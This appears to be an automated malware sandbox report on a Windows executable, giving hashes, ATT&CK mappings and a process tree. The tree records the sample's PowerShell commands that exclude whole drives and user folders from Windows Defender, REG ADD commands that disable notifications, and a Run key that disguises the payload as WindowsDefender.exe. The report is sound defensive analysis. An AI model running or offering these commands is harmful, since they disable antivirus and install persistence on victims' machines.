Overview
overview
10Static
static
100eac1dd90f...0d.exe
windows7-x64
100eac1dd90f...0d.exe
windows10-2004-x64
10119f9287f4...9c.exe
windows7-x64
10119f9287f4...9c.exe
windows10-2004-x64
10202588cc1d...10.exe
windows7-x64
10202588cc1d...10.exe
windows10-2004-x64
1028b51218b1...09.exe
windows7-x64
1028b51218b1...09.exe
windows10-2004-x64
10583c56547b...6a.exe
windows7-x64
3583c56547b...6a.exe
windows10-2004-x64
373782bd2a7...e8.exe
windows7-x64
1073782bd2a7...e8.exe
windows10-2004-x64
10d279fb4121...d7.exe
windows7-x64
10d279fb4121...d7.exe
windows10-2004-x64
10Analysis
-
max time kernel
119s -
max time network
131s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
06-11-2024 23:55
Behavioral task
behavioral1
Sample
0eac1dd90fbafb505a3b627d166d9ef62db4e2df68da9bbc2e39db0573ecd00d.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
0eac1dd90fbafb505a3b627d166d9ef62db4e2df68da9bbc2e39db0573ecd00d.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
119f9287f46d3ed3888403c3c21054974a0e8926ef247fc065164a8d58303c9c.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
119f9287f46d3ed3888403c3c21054974a0e8926ef247fc065164a8d58303c9c.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
202588cc1d6cebb32b5888f7e9bbbfa9aa1d5e3ab6a116892cb90486ac4e7d10.exe
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
202588cc1d6cebb32b5888f7e9bbbfa9aa1d5e3ab6a116892cb90486ac4e7d10.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
28b51218b1f1a5250f851180c3bca3c79397a9fc36089a2e356f45b667881209.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
28b51218b1f1a5250f851180c3bca3c79397a9fc36089a2e356f45b667881209.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
583c56547b1a00fcb4c0f4920998e0c0ee812691c2bfae7a643dab639e7faa6a.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
583c56547b1a00fcb4c0f4920998e0c0ee812691c2bfae7a643dab639e7faa6a.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
73782bd2a7e22ad9b0cf75db952caac03b1db76549dfa8d79d68af50056359e8.exe
Resource
win7-20241010-en
Behavioral task
behavioral12
Sample
73782bd2a7e22ad9b0cf75db952caac03b1db76549dfa8d79d68af50056359e8.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
d279fb4121b6a7e552133823a497b4d2502b1494bc0864e2c8689fe92eef7fd7.exe
Resource
win7-20240903-en
General
-
Target
202588cc1d6cebb32b5888f7e9bbbfa9aa1d5e3ab6a116892cb90486ac4e7d10.exe
-
Size
4.6MB
-
MD5
c7620b77d05f9dac8105469b7d0c854f
-
SHA1
5368819b5aa8db1ee7f5cc5b4b50ecb6aa6faf55
-
SHA256
202588cc1d6cebb32b5888f7e9bbbfa9aa1d5e3ab6a116892cb90486ac4e7d10
-
SHA512
0fb1e57e2fd053bacbba7a0aabc00c162432c33a9332bac2c45036173fccbe5bebc2906568d2facea4fcf0963dcfcb557bff932dbb2dc2ec5b8cd736213101d3
-
SSDEEP
98304:I1qaURDb8PNfMVNnlqKL0T/46KhPLQYVVW4G1jOUc/hItwGn:I1zsf8PNfkl/m4zdLQYPZGNI/hmVn
Malware Config
Signatures
-
Processes:
reg.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications reg.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 2360 powershell.exe 2024 powershell.exe 2924 powershell.exe 2876 powershell.exe 3040 powershell.exe 2892 powershell.exe -
Disables Task Manager via registry modification
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\DEFENDERSERVICE = "C:\\Users\\Admin\\AppData\\Local\\NEWDRIVERS2\\WindowsDefender.exe" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 2876 powershell.exe 3040 powershell.exe 2892 powershell.exe 2360 powershell.exe 2024 powershell.exe 2924 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2876 powershell.exe Token: SeDebugPrivilege 3040 powershell.exe Token: SeDebugPrivilege 2892 powershell.exe Token: SeDebugPrivilege 2360 powershell.exe Token: SeDebugPrivilege 2024 powershell.exe Token: SeDebugPrivilege 2924 powershell.exe -
Suspicious use of WriteProcessMemory 36 IoCs
Processes:
202588cc1d6cebb32b5888f7e9bbbfa9aa1d5e3ab6a116892cb90486ac4e7d10.execmd.exedescription pid Process procid_target PID 1276 wrote to memory of 2008 1276 202588cc1d6cebb32b5888f7e9bbbfa9aa1d5e3ab6a116892cb90486ac4e7d10.exe 30 PID 1276 wrote to memory of 2008 1276 202588cc1d6cebb32b5888f7e9bbbfa9aa1d5e3ab6a116892cb90486ac4e7d10.exe 30 PID 1276 wrote to memory of 2008 1276 202588cc1d6cebb32b5888f7e9bbbfa9aa1d5e3ab6a116892cb90486ac4e7d10.exe 30 PID 2008 wrote to memory of 2876 2008 cmd.exe 32 PID 2008 wrote to memory of 2876 2008 cmd.exe 32 PID 2008 wrote to memory of 2876 2008 cmd.exe 32 PID 2008 wrote to memory of 3040 2008 cmd.exe 33 PID 2008 wrote to memory of 3040 2008 cmd.exe 33 PID 2008 wrote to memory of 3040 2008 cmd.exe 33 PID 2008 wrote to memory of 2892 2008 cmd.exe 34 PID 2008 wrote to memory of 2892 2008 cmd.exe 34 PID 2008 wrote to memory of 2892 2008 cmd.exe 34 PID 2008 wrote to memory of 2360 2008 cmd.exe 35 PID 2008 wrote to memory of 2360 2008 cmd.exe 35 PID 2008 wrote to memory of 2360 2008 cmd.exe 35 PID 2008 wrote to memory of 2024 2008 cmd.exe 36 PID 2008 wrote to memory of 2024 2008 cmd.exe 36 PID 2008 wrote to memory of 2024 2008 cmd.exe 36 PID 2008 wrote to memory of 2924 2008 cmd.exe 37 PID 2008 wrote to memory of 2924 2008 cmd.exe 37 PID 2008 wrote to memory of 2924 2008 cmd.exe 37 PID 2008 wrote to memory of 1676 2008 cmd.exe 38 PID 2008 wrote to memory of 1676 2008 cmd.exe 38 PID 2008 wrote to memory of 1676 2008 cmd.exe 38 PID 2008 wrote to memory of 1680 2008 cmd.exe 39 PID 2008 wrote to memory of 1680 2008 cmd.exe 39 PID 2008 wrote to memory of 1680 2008 cmd.exe 39 PID 2008 wrote to memory of 2844 2008 cmd.exe 40 PID 2008 wrote to memory of 2844 2008 cmd.exe 40 PID 2008 wrote to memory of 2844 2008 cmd.exe 40 PID 2008 wrote to memory of 1560 2008 cmd.exe 41 PID 2008 wrote to memory of 1560 2008 cmd.exe 41 PID 2008 wrote to memory of 1560 2008 cmd.exe 41 PID 2008 wrote to memory of 2976 2008 cmd.exe 42 PID 2008 wrote to memory of 2976 2008 cmd.exe 42 PID 2008 wrote to memory of 2976 2008 cmd.exe 42
Processes
-
C:\Users\Admin\AppData\Local\Temp\202588cc1d6cebb32b5888f7e9bbbfa9aa1d5e3ab6a116892cb90486ac4e7d10.exe"C:\Users\Admin\AppData\Local\Temp\202588cc1d6cebb32b5888f7e9bbbfa9aa1d5e3ab6a116892cb90486ac4e7d10.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1276 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\NEWDRIVERS2\1.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "D:"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:/NEWDRIVERS"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\NEWDRIVERS2"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f /v DisableTaskMgr /t REG_DWORD /d 03⤵PID:1676
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Policies\Microsoft\Windows\Explorer" /f /v DisableNotificationCenter /t REG_DWORD /d 13⤵PID:1680
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /f /v DisableEnhancedNotifications /t REG_DWORD /d 13⤵
- Modifies Windows Defender notification settings
PID:2844
-
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v DEFENDERSERVICE /t REG_SZ /d "C:\Users\Admin\AppData\Local\NEWDRIVERS2\WindowsDefender.exe"3⤵
- Adds Run key to start application
- Modifies registry key
PID:1560
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\NEWDRIVERS2\rar.bat3⤵PID:2976
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5d3c39da2d7207deda43b50b864d711a6
SHA1524e21299fbd42ec1a615a5d67117312996c7922
SHA2568f803b854c5ae49b6529e08a507a575b695adf826d995ecddd55a315e12d8da7
SHA512f9e1337a2bf229bc454ff1972b50886baac93ea5f4bb0f8482eb4f9aa1183876973cc00ff9bc19e0cd067576e71224f70de9d27b04407087be5ef89180518cc7
-
Filesize
351B
MD5ce7ef89a43335bb80b9e9b0b67d1a904
SHA1d1abb8760f3f95744c457825ce89a6686dd094d6
SHA2568819312c4d6d83836551a96f3ba8f793db1b6caf573a4fdfc1f26cfc71a3116f
SHA512b03e4f0a3fb727a63583699e7b8a4735edc607d00ada573bc8c7eb6e03a3c386fbc94610a80ea78df857f345f2756a8bdd2e42e6236911f214ee15bf92984ac0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD554dd9b0fc19e0dd54114476ade307b21
SHA1a7374bd4cfdff10cbe7fbc2c1bad27e9caa72fdd
SHA256d26aabf3fa1cb0177be61d28c13b452d7fa9d8d9662c98df1ce6e7a39bef8487
SHA51230420b8a8751b3cde519f47ff8f788a9ef4764ecac454e96a6b4aaa4804b7cf2a3eb5160a32aba96684bbfab050c448b996f35f41d09ca049cfbfa8216599e2b
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e